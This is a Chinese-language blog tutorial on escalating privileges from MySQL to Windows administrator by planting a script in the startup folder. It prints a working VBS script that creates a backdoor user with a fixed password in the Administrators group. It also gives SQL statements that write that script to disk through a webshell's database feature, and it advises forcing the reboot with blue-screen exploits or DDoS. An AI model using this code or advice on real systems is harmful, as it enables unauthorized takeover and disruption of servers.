MySQL提权之启动项提权
关于MySQL的启动项提权,听其名知其意。就是将一段 VBS脚本导入到 C:\Documents and Settings\All Users\「开始」菜单\程序\启动 下,如果管理员重启了服务器,那么就会自动调用该脚本,并执行其中的用户添加及提权命令!
这里有两种思路:
1. 如果 C:\Documents and Settings\All Users\「开始」菜单\程序\启动 目录存在可读写的权限,那么我们可以直接将 VBS 提权脚本上传到该目录下!
VBS 提权脚本代码如下:
1 setwsnetwork=CreateObject("WSCRIPT.NETWORK")
2 os="WinNT://"&wsnetwork.ComputerName
3 Set ob=GetObject(os)
4 Setoe=GetObject(os&"/Administrators,group")
5 Set od=ob.Create("user","secist")
6 od.SetPassword "secist.com"
7 od.SetInfo
8 Set of=GetObject(os&"/secist",user)
9 oe.add os&"/secist"
将以上代码保存为 .vbs 后缀的文件上传即可!
2. 通过大马的MySQL执行功能,利用SQL命令来进行VBS脚本的创建及添加。
create table secist(cmd text);
insert into secist values(“set wshshell=createobject(“”wscript.shell””)”);
insert into secist values(“a=wshshell.run(“”cmd.exe /c net user secist secist.com /add“”,0)”);
insert into secist values(“b=wshshell.run(“”cmd.exe /c net localgroup administrators secist /add“”,0)”);
select * from secist into dumpfile “C:\Documents and Settings\All Users\「开始」菜单\程序\启动\secist.vbs”;
写入文件报错 修改配置文件也无法写入
只能修改写入文件的路径
再将生成的文件移动到自启动目录
成功执行以上命令后,只要管理员重启了服务器,我们就可以成功提权了!
温馨提示:
1.关于重启目标服务器,我们可以利用一些可导致服务器蓝屏的EXP,或者DDoS拒绝服务!
2.上传的目录必须具备可读写的权限!
3.调用的 cmd 也必须有足够的权限!
参考:https://blog.csdn.net/qq_37077262/article/details/102964050
https://www.cnblogs.com/wh4am1/p/6613759.html
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 基于Microsoft.Extensions.AI核心库实现RAG应用
· Linux系列:如何用heaptrack跟踪.NET程序的非托管内存泄露
· 开发者必知的日志记录最佳实践
· SQL Server 2025 AI相关能力初探
· Linux系列:如何用 C#调用 C方法造成内存泄露
· 无需6万激活码!GitHub神秘组织3小时极速复刻Manus,手把手教你使用OpenManus搭建本
· Manus爆火,是硬核还是营销?
· 终于写完轮子一部分:tcp代理 了,记录一下
· 别再用vector<bool>了!Google高级工程师:这可能是STL最大的设计失误
· 单元测试从入门到精通